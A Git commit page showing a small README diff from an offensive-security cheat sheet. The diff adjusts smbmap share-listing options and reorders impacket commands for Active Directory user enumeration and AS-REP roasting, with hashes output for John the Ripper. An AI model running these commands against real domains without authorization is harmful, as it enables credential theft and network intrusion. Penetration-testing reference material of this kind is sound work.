kqjy/Offensive-Security-Cheat-Sheet
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update README.md

Browse Source
This commit is contained in:
Joe Totes
2022-09-06 10:32:16 -04:00
committed by GitHub
parent c200d697c0
commit 66be963dd3
1 changed files with 7 additions and 4 deletions
Download Patch File Download Diff File Expand all files Collapse all files

11
README.md
View File

@@ -486,7 +486,7 @@ ldapsearch -H ldap://{IP ADDRESS} -x -b "{DC NAMING CONTEXT}" '(objectClass=Pers
smbmap -H {IP ADDRESS}
# Recursively show all readable files and shares
smbmap -R {SHARE} -H {IP ADDRESS}
smbmap -R {SHARE} -H {IP ADDRESS} --depth 10
# Download a file with smbmap
smbmap -R {SHARE} -H {IP ADDRESS} -A {FILE} -q
@@ -663,10 +663,13 @@ net user {USERNAME} /domain
# Enumerate all groups in domain
net group /domain
# ASREP ROAST
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -request {DOMAIN1}.{DOMAIN2}/ -dc-ip {IP ADDRESS} -format john
# Get Active Directory Users
python3 /usr/share/doc/python3-impacket/examples/GetADUsers.py -all {DOMAIN}/{USERNAME}:{PASSWORD} -dc-ip {IP ADDRESS}
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py {DOMAIN1}.{DOMAIN2}/ -dc-ip {IP ADDRESS} -usersfile {USER.txt} -format john
# ASREP ROAST
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -request {DOMAIN1.DOMAIN2}/ -dc-ip {IP ADDRESS} -format john
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py {DOMAIN1.DOMAIN2}/ -dc-ip {IP ADDRESS} -usersfile {USER.txt} -format john
# Bloodhound
sudo neo4j console # LHOST